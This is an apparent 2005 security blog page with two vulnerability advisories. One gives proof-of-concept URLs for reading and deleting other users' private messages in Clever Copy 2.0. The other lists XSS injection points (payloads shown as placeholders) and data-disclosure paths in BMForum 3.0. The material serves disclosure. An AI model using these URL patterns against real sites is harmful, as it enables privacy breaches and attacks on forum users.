Clever Copy Unauthorized read & delete Private Messages

Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.

The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged for have access to private messages
and go to this url:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we look the message 2 from waltrapass user :)

op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM

for delete a message we can go to similar url:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass

##################### €nd #############################

thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Multiple Cross site scripting in BMForum

################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisore:http://lostmon.blogspot.com/2005/07/
multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################


BMForum contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.



####################
VERSIONS
####################

BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1


###################
Solution:
###################

No solution at this time.

###################
Timeline:
###################

Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005

###################
Proof of XSS
####################

####################
topic.php
####################

http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]

#################
forums.php
#################

http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]


###################
post.php
###################

http://[VICTIM]/post.php?forumid=2\[XSS-CODE]

###################
announcesys.php
###################

http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]

#################
Others
#################

http://[VICTIM]/datafile/regipbans.php //ips baned.
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.
http://[VICTIM]/post_global.php //full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure

################### €nd ######################

thnx to estrella to be my ligth.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...